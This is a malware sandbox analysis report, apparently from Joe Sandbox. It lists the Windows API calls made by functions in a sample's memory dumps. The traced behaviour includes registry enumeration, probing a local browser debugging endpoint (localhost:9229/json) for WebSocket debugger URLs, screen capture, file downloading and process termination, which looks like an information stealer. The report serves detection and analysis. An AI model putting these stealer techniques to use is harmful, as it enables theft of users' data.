                        • Instruction Fuzzy Hash: A3B19171E1025D9BDB20EFA4DC849EE7BB9FF48304F048569EA05A7290DB389E45CB64
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FB330
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB37E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB3A9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FB3B1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB3D9
                        • lstrlen.KERNEL32(00524C50), ref: 004FB450
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB474
                        • lstrcat.KERNEL32(00000000,00524C50), ref: 004FB480
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB4A9
                        • lstrlen.KERNEL32(00000000), ref: 004FB52D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB557
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FB55F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB587
                        • lstrlen.KERNEL32(00524AD4), ref: 004FB5FE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB622
                        • lstrcat.KERNEL32(00000000,00524AD4), ref: 004FB62E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB65E
                        • lstrlen.KERNEL32(?), ref: 004FB767
                        • lstrlen.KERNEL32(?), ref: 004FB776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FB79E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: f5f212e3cfeacb8af6f4085a6bbb2a8dee466a9bbe72e1c6af0a129ad95c2daa
                        • Instruction ID: 1a5f21f291ea6f0593d0ed03f88193ebbd7739f39bd2b6d0cbca07a04a651f4e
                        • Opcode Fuzzy Hash: f5f212e3cfeacb8af6f4085a6bbb2a8dee466a9bbe72e1c6af0a129ad95c2daa
                        • Instruction Fuzzy Hash: CC025F30A01209CFDB25DF55D949A7BB7B5EF41308F18806EEA099B3A1D779DC42CB89
                        APIs
                          • Part of subcall function 005171E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 005171FE
                        • RegOpenKeyExA.ADVAPI32(?,0103B0B0,00000000,00020019,?), ref: 005137BD
                        • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 005137F7
                        • wsprintfA.USER32 ref: 00513822
                        • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00513840
                        • RegCloseKey.ADVAPI32(?), ref: 0051384E
                        • RegCloseKey.ADVAPI32(?), ref: 00513858
                        • RegQueryValueExA.ADVAPI32(?,0103DD20,00000000,000F003F,?,?), ref: 005138A1
                        • lstrlen.KERNEL32(?), ref: 005138B6
                        • RegQueryValueExA.ADVAPI32(?,0103DCD8,00000000,000F003F,?,00000400), ref: 00513927
                        • RegCloseKey.ADVAPI32(?), ref: 00513972
                        • RegCloseKey.ADVAPI32(?), ref: 00513989
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 13140697-3278919252
                        • Opcode ID: 79146fc424947cae001ac9b431ee5ba5d4ad90fa4b99180fb67b4a784cc909c5
                        • Instruction ID: 1fa85e560f0d4cb2036c7fbff4c292551547a72c272ef0bef697202bb2faba62
                        • Opcode Fuzzy Hash: 79146fc424947cae001ac9b431ee5ba5d4ad90fa4b99180fb67b4a784cc909c5
                        • Instruction Fuzzy Hash: 97918272E002099FDB20DF94DD849EEBBB9FF48310F148569E609A7251D7359E86CF90
                        APIs
                        • InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F90DF
                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 004F90FC
                        • InternetCloseHandle.WININET(00000000), ref: 004F9109
                        • InternetReadFile.WININET(?,?,?,00000000), ref: 004F9166
                        • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004F9197
                        • InternetCloseHandle.WININET(00000000), ref: 004F91A2
                        • InternetCloseHandle.WININET(00000000), ref: 004F91A9
                        • strlen.MSVCRT ref: 004F91BA
                        • strlen.MSVCRT ref: 004F91ED
                        • strlen.MSVCRT ref: 004F922E
                        • strlen.MSVCRT ref: 004F924C
                          • Part of subcall function 004F8980: std::_Xinvalid_argument.LIBCPMT ref: 004F8996
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                        • API String ID: 1530259920-2144369209
                        • Opcode ID: e959ed68feb2b967745d55c761e25320199bf29ba1aeff146c44e0c93ae1f195
                        • Instruction ID: b8798ebff71901d29fdb8f0bcde8bf2a9767e38473d3dbd4861a5592432d5da1
                        • Opcode Fuzzy Hash: e959ed68feb2b967745d55c761e25320199bf29ba1aeff146c44e0c93ae1f195
                        • Instruction Fuzzy Hash: 3451E8716402096BEB20DFA4DC45FEEBBF9EF48710F14406AF504E32C0DBB5A9458B65
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 005116A1
                        • lstrcpy.KERNEL32(00000000,0102B270), ref: 005116CC
                        • lstrlen.KERNEL32(?), ref: 005116D9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005116F6
                        • lstrcat.KERNEL32(00000000,?), ref: 00511704
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0051172A
                        • lstrlen.KERNEL32(01039B68), ref: 0051173F
                        • lstrcpy.KERNEL32(00000000,?), ref: 00511762
                        • lstrcat.KERNEL32(00000000,01039B68), ref: 0051176A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00511792
                        • ShellExecuteEx.SHELL32(?), ref: 005117CD
                        • ExitProcess.KERNEL32 ref: 00511803
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                        • String ID: <
                        • API String ID: 3579039295-4251816714
                        • Opcode ID: b0bc65b94e6a4a770f1940374052b90ccec332d087dc66f8e8c6563a0d1dc2a6
                        • Instruction ID: ffb776f8882fae7d3093649e63888b824f4619bdbf110fbfe81b090a00031c1e
                        • Opcode Fuzzy Hash: b0bc65b94e6a4a770f1940374052b90ccec332d087dc66f8e8c6563a0d1dc2a6
                        • Instruction Fuzzy Hash: 17517670A0161D9BDB21DFA5CD84ADEBBF9FF44300F044169E605D3391DB74AE468B58
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EFE4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050F012
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0050F026
                        • lstrlen.KERNEL32(00000000), ref: 0050F035
                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 0050F053
                        • StrStrA.SHLWAPI(00000000,?), ref: 0050F081
                        • lstrlen.KERNEL32(?), ref: 0050F094
                        • lstrlen.KERNEL32(00000000), ref: 0050F0B2
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0050F0FF
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0050F13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$AllocLocal
                        • String ID: ERROR
                        • API String ID: 1803462166-2861137601
                        • Opcode ID: 2a3c0bc1bcf6e445d005d27bd83b6802127062ba9b0d201e2ad0bab1adc55c29
                        • Instruction ID: 39df69c897e30bc2e3835fdd92faf0077174b9b29af02422ed28a14c27b40caa
                        • Opcode Fuzzy Hash: 2a3c0bc1bcf6e445d005d27bd83b6802127062ba9b0d201e2ad0bab1adc55c29
                        • Instruction Fuzzy Hash: 7A51AE31A102099BCB31AF35DD49A7E7BA5FF55304F08842DF94A9B292DB78DC028B94
                        APIs
                        • GetEnvironmentVariableA.KERNEL32(01038880,00729BD8,0000FFFF), ref: 004FA026
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FA053
                        • lstrlen.KERNEL32(00729BD8), ref: 004FA060
                        • lstrcpy.KERNEL32(00000000,00729BD8), ref: 004FA08A
                        • lstrlen.KERNEL32(00524C4C), ref: 004FA095
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FA0B2
                        • lstrcat.KERNEL32(00000000,00524C4C), ref: 004FA0BE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FA0E4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FA0EF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FA114
                        • SetEnvironmentVariableA.KERNEL32(01038880,00000000), ref: 004FA12F
                        • LoadLibraryA.KERNEL32(0103D2E8), ref: 004FA143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                        • String ID:
                        • API String ID: 2929475105-0
                        • Opcode ID: 1e60243e2ac1e3efad13f71ba790221b719e10d677a6682d52bed2dd464eb8a1
                        • Instruction ID: 0dd0e7a9915f9851f1b396ee0286b1e538601ddad75e8641124dfeda89252d61
                        • Opcode Fuzzy Hash: 1e60243e2ac1e3efad13f71ba790221b719e10d677a6682d52bed2dd464eb8a1
                        • Instruction Fuzzy Hash: F491E8B0A016088FD7309FA4DC44A7737A5EB54704F46805AEB09873A1EFBEDD518B8B
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050C8A2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050C8D1
                        • lstrlen.KERNEL32(00000000), ref: 0050C8FC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050C932
                        • StrCmpCA.SHLWAPI(00000000,00524C3C), ref: 0050C943
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 1c288bd26bdb59952af0cae3d997041617bb601764d02532e2c601e297a30d57
                        • Instruction ID: ceba12fae372ab4798df6b145add9428a11fde0b12de5f307993b2924e3d6ccf
                        • Opcode Fuzzy Hash: 1c288bd26bdb59952af0cae3d997041617bb601764d02532e2c601e297a30d57
                        • Instruction Fuzzy Hash: 7461F371E0121A9BDB20EFB5CD45ABE7FB8BF06300F044629E901E7291D7788D068B94
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00510CF0), ref: 00514276
                        • GetDesktopWindow.USER32 ref: 00514280
                        • GetWindowRect.USER32(00000000,?), ref: 0051428D
                        • SelectObject.GDI32(00000000,00000000), ref: 005142BF
                        • GetHGlobalFromStream.COMBASE(00510CF0,?), ref: 00514336
                        • GlobalLock.KERNEL32(?), ref: 00514340
                        • GlobalSize.KERNEL32(?), ref: 0051434D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                        • String ID:
                        • API String ID: 1264946473-0
                        • Opcode ID: dc370bfed3f819e73904ef8f9136cd578c8f67274b96816211efd8917071d2f4
                        • Instruction ID: 9b92312d424a0062e8fdbbbcb90b137dcd739ae8378a29934f75ddab58aba0b0
                        • Opcode Fuzzy Hash: dc370bfed3f819e73904ef8f9136cd578c8f67274b96816211efd8917071d2f4
                        • Instruction Fuzzy Hash: E3513F75A1020DAFDB20DFA4DD85EEE7BB9FF48304F104519FA05A3250DB78AD428BA5
                        APIs
                        • lstrcat.KERNEL32(?,0103DF78), ref: 0050E00D
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050E037
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0050E07D
                        • lstrcat.KERNEL32(?,?), ref: 0050E098
                        • lstrcat.KERNEL32(?,?), ref: 0050E0AC
                        • lstrcat.KERNEL32(?,0102B248), ref: 0050E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0050E0D4
                        • lstrcat.KERNEL32(?,0103D368), ref: 0050E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0050E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 4230089145-0
                        • Opcode ID: 8371cbb6128f20ad30e4478fa619ab7f470db5f963e0229ed2d1bc92fed451d1
                        • Instruction ID: 2135ee88b16e7e35a62a3ba09d58ba03daa46f3a115e4124d84e99ab59c06843
                        • Opcode Fuzzy Hash: 8371cbb6128f20ad30e4478fa619ab7f470db5f963e0229ed2d1bc92fed451d1
                        • Instruction Fuzzy Hash: 0D617171D1011CDBCB65DB64CD45AEDB7B4FF48300F1489A9A609A3290DBB49F86CF94
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F6AFF
                        • InternetOpenA.WININET(0051CFEC,00000001,00000000,00000000,00000000), ref: 004F6B2C
                        • StrCmpCA.SHLWAPI(?,0103E358), ref: 004F6B4A
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 004F6B6A
                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004F6B88
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004F6BA1
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 004F6BC6
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004F6BF0
                        • CloseHandle.KERNEL32(00000000), ref: 004F6C10
                        • InternetCloseHandle.WININET(00000000), ref: 004F6C17
                        • InternetCloseHandle.WININET(?), ref: 004F6C21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                        • String ID:
                        • API String ID: 2500263513-0
                        • Opcode ID: fcab7bc368b04e2e9eb3db97f1d3527d2866dc41819cf78c0c8654aaa50616c4
                        • Instruction ID: 7d336337464174d56bb198338ed836e489dea17755e94cdc70d1cb8cbeff093f
                        • Opcode Fuzzy Hash: fcab7bc368b04e2e9eb3db97f1d3527d2866dc41819cf78c0c8654aaa50616c4
                        • Instruction Fuzzy Hash: C1418271A00219ABDB20DF64DD45FAE7778EB04700F048559FB05E7290EF78AE418BA8
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00504F39), ref: 00514545
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0051454C
                        • wsprintfW.USER32 ref: 0051455B
                        • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 005145CA
                        • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 005145D9
                        • CloseHandle.KERNEL32(00000000,?,?), ref: 005145E0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                        • String ID: 9OP$%hs$9OP
                        • API String ID: 885711575-2099957563
                        • Opcode ID: 61081f1f7791fbf0dc5f9ee4b4f2530f3092e3a703a1889b11063e391651b197
                        • Instruction ID: 8c5717e532c279f9b1268377574233ae74e0eca0355fe117b564afebd03f4ad3
                        • Opcode Fuzzy Hash: 61081f1f7791fbf0dc5f9ee4b4f2530f3092e3a703a1889b11063e391651b197
                        • Instruction Fuzzy Hash: D7316172A01209BBEB20DBE4DD49FDE7B79FF45700F104055F605E7180EB746A428BAA
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FBC1F
                        • lstrlen.KERNEL32(00000000), ref: 004FBC52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FBC7C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FBC84
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FBCAC
                        • lstrlen.KERNEL32(00524AD4), ref: 004FBD23
                        Memory Dump Source
